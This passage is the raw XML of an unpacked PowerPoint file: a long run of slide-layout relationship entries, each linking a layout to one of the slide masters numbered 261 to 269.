<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster261.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2607.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster261.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2608.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster261.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2609.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster261.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout261.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610.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster261.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2611.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2612.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2613.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2614.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2615.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2616.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2617.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2618.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2619.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout262.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620.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster262.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2621.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2622.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2623.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2624.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2625.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2626.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2627.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2628.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2629.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout263.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630.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster263.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2631.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2632.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2633.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2634.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2635.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2636.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2637.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2638.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2639.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout264.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640.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster264.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2641.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2642.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2643.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2644.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2645.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2646.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2647.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2648.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2649.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout265.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650.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster265.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2651.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2652.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2653.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2654.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2655.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2656.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2657.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2658.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2659.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout266.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660.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster266.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2661.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2662.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2663.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2664.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2665.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2666.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2667.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2668.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2669.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout267.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670.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster267.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2671.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2672.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2673.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2674.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2675.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2676.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2677.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2678.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2679.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout268.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680.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster268.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2681.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2682.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2683.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2684.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2685.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2686.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2687.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2688.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2689.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout269.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690.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster269.xml"/></Relationships>
